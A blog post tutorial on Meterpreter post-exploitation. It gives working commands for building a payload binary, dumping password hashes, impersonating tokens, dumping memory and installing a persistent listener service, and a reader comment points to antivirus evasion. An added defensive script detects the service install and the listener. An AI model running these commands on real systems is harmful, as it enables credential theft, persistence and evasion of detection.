Meterpreter, short for The Meta-Interpreter, is an advanced payload that is included in the Metasploit Framework. Its purpose is to provide complex and advanced features that would otherwise be tedious to implement purely in assembly. It accomplishes this by allowing developers to write their own extensions in the form of shared object (DLL) files that can be uploaded and injected into a running process on a target computer after exploitation has occurred. Meterpreter and all of the extensions that it loads are executed entirely from memory and never touch the disk, thus allowing them to execute under the radar of standard anti-virus detection.
First of all, I would like to remark that I use Meterpreter as a standalone binary most of the time. To create a binary for uploading to a server you can use this command:
./msfpayload windows/meterpreter/bind_tcp LPORT=443 X > mymeterpreter.exe
Once the binary is uploaded and executed (I leave this to you), you have to launch the multi/handler exploit to manage the connection to Meterpreter, in this case:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 E
Or inside the Metasploit console:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit
Well, once we have a working connection, these are some things that you can do:
-Port forwarding: you can set up port redirections:
meterpreter> portfwd -a -L 127.0.0.1 -l 444 -h destiny -p 3389
-L = IP address that will hold the listening port
-l = the listening port
-h = the target host
-p = the target port
Now you connect to port 444 and the connection is forwarded to the target host (destiny) on port 3389.
More on forwarding and routing here.
-Hash dumps: you can get the hashes of the user accounts, like the pwdump utility, for later cracking.
meterpreter> use priv (we load the priv extension)
meterpreter> hashdump
You need Admin/System privileges for this to work.
-User impersonation, using the token passing technique: you can use Meterpreter to perform the "pass the token" attack, introduced by Luke Jennings, to impersonate another user:
meterpreter> use incognito (we load the incognito module)
meterpreter> list_tokens (we list all available sessions)
meterpreter> impersonate_token oracle-en\\Administrator (we impersonate as the user oracle-en\\Administrator)
You need Admin/System privileges for this to work.
If you want to revert the situation and obtain your original session, you can execute:
meterpreter> rev2self
More on working with Incognito and Meterpreter at Carnal0wnage.
-Dumping memory to extract hashes (using mdd.exe): here we first need to upload mdd.exe (ManTech):
meterpreter> upload mdd.exe .
meterpreter> execute -f mdd.exe -a "-o mydump.dd"
meterpreter> download mydump.dd .
Now we can use Volatility to:
- cachedump Dump (decrypted) domain hashes from the registry
- hashdump Dump (decrypted) LM and NT hashes from the registry
- hivelist Print list of registry hives
- hivescan Scan for _CMHIVE objects (registry hives)
- lsadump Dump (decrypted) LSA secrets from the registry
More information on using Meterpreter + mdd + Volatility on the Attack Research blog.
Another resource for Meterpreter plugins is the DarkOperator website, where we can find some modules like:
- Disable_Audit: disables auditing by changing the local security policy
- GetGui: script for enabling the RDP service on the target host
- GetTelnet: this script will enable the Telnet service on Win2003 and XP, and will install it on Vista and 2008
- Memdump: automation for mdd
- WinEnum: script that will gather a large amount of information about the host
- Scheduleme: this will allow for task scheduling on the target host; it will run the commands as System
- NetEnum: performs network enumeration, ping sweeps, reverse DNS lookups, etc.
- Soundrecorder: allows you to record sound on the target machine :)
- GetCounterMeasure: this script will identify antivirus, HIPS, HIDS, firewalls, etc.
You can find examples of these modules and their source code on the DarkOperator website under the Meterpreter zone; many of them are included in the Metasploit project.
Meterpreter service wrapper:
You can use Metsvc to run Meterpreter as a Windows service, or as a command line application. You have to download it from Phreedom.org (Alexander Sotirov).
c:\> metsvc.exe install-service (it will listen on port 31337)
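From the defender's side, the service wrapper is the one piece of this post that leaves a durable footprint on the host: a newly installed Windows service (recorded in the System log as Event ID 7045, "A service was installed in the system") and a new TCP listener, by default on port 31337 as the post states. The script below is an added example, not code from the original post or from Metasploit; it reviews constructed sample 7045 records and a constructed netstat-style listener table and flags a service whose image lives outside the trusted system directories, and any listener that is not on an explicit allowlist. The record layout (`EventID=... ServiceName=... ImagePath=... StartType=...`) is an assumed flattened form of the event's fields, chosen for the sample; adapt the regex to the export format you actually collect.

```python
"""Added example (not part of the original post): flag the host-side footprint
of a Meterpreter service wrapper, i.e. a suspicious service install and an
unexpected TCP listener.  All input below is constructed sample data."""
import re
from dataclasses import dataclass

# Directories where legitimately installed service binaries normally live
# (lower-case for comparison).  Extend for your environment.
TRUSTED_IMAGE_DIRS = (r"c:\windows\system32", r"c:\program files")

# Assumed flattened layout of an Event ID 7045 record; adjust to your log export.
EVENT_7045_RE = re.compile(
    r"EventID=7045\s+ServiceName=(?P<name>\S+)\s+ImagePath=(?P<path>.+?)\s+StartType=(?P<start>\S+)"
)

# Constructed sample System-log records (one benign install, one suspicious).
SYSTEM_LOG = [
    r"EventID=7036 ServiceName=Spooler State=running",
    r'EventID=7045 ServiceName=Dhcp ImagePath="C:\Windows\System32\svchost.exe -k NetworkService" StartType=auto',
    r'EventID=7045 ServiceName=metsvc ImagePath="C:\Temp\metsvc.exe" StartType=auto',
]

# Constructed sample of `netstat -ano` output (header plus a few rows).
NETSTAT = [
    "Proto  Local Address      Foreign Address    State        PID",
    "TCP    0.0.0.0:135        0.0.0.0:0          LISTENING    880",
    "TCP    0.0.0.0:445        0.0.0.0:0          LISTENING    4",
    "TCP    0.0.0.0:31337      0.0.0.0:0          LISTENING    1532",
    "TCP    192.168.1.10:3389  192.168.1.20:51234 ESTABLISHED  1200",
    "UDP    0.0.0.0:137        *:*                             1120",
]


@dataclass
class Finding:
    source: str   # which check raised it: "7045" or "netstat"
    detail: str   # human-readable description


def check_service_installs(lines):
    """Return a Finding for each 7045 record whose image path is not under a trusted directory."""
    findings = []
    for line in lines:
        m = EVENT_7045_RE.search(line)
        if not m:
            continue
        path = m.group("path").strip().strip('"').lower()
        if not path.startswith(TRUSTED_IMAGE_DIRS):
            findings.append(Finding("7045", f"service {m.group('name')} installed from untrusted path {path}"))
    return findings


def check_listeners(netstat_lines, allowed_ports):
    """Return a Finding for each TCP LISTENING socket whose port is not on the allowlist."""
    findings = []
    for line in netstat_lines:
        parts = line.split()
        if len(parts) < 5 or parts[0].upper() != "TCP" or parts[3] != "LISTENING":
            continue
        port = int(parts[1].rsplit(":", 1)[1])
        if port not in allowed_ports:
            findings.append(Finding("netstat", f"unexpected listener on port {port} (pid {parts[4]})"))
    return findings


def run_checks(log_lines=SYSTEM_LOG, netstat_lines=NETSTAT, allowed_ports=frozenset({135, 445, 3389})):
    """Run both checks and return the combined list of findings."""
    return check_service_installs(log_lines) + check_listeners(netstat_lines, allowed_ports)


if __name__ == "__main__":
    for f in run_checks():
        print(f"[{f.source}] {f.detail}")
```

With the sample data the script reports the `metsvc` install from `C:\Temp` and the listener on 31337; the benign `Dhcp` install under `System32` and the allowlisted ports are silent. An allowlist of expected listeners is deliberately used instead of a blocklist of known ports, because the wrapper's port is an option, not a constant.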
Well, that's all for now. I would like to thank Chris Gates and Carlos Perez (DarkOperator) for their work with Meterpreter, a great tool for post exploitation and maybe a feature underestimated by many and unknown by others.
Also a big thanks to the whole Metasploit team for their great work.
Enjoy your post exploitation ...
-CMM
5 comments:
Just a note that you can encode the Meterpreter binaries to help subvert AV (using msfencode). See:
Metasploit Updates to MSFEncode - InDepthDefense.com
Yes Jcran, you are right, thanks for sharing :)
Just wanted to let you know that under your instructions for "HashDump" it should be 'use priv' instead of 'use privs'.
Hello!!
Can you explain to me how to connect to the Meterpreter service???
I installed a Meterpreter service on a test computer (WinXP) on VMware, but I can't connect!!!
Sorry for my bad English, and thanks!!!
Some source of information on how to hack/extend Meterpreter?